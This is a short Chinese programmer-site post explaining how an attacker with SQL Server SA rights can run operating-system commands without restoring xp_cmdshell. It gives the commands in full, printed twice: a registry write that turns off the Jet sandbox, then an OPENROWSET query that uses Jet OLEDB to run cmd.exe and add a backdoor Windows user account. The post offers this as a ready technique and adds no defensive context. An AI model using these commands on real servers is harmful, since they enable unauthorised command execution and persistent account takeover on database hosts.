SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
程序员文章站
2022-03-20 13:56:58
首先开启沙盘模式: exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\en...
首先开启沙盘模式:
exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
exec master..xp_regwrite 'hkey_local_machine','software\microsoft\jet\4.0\engines','sandboxmode','reg_dword',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
上一篇: 用vbs实现不死帐号的代码
下一篇: 用vbs实现本地连接禁用/启用脚本代码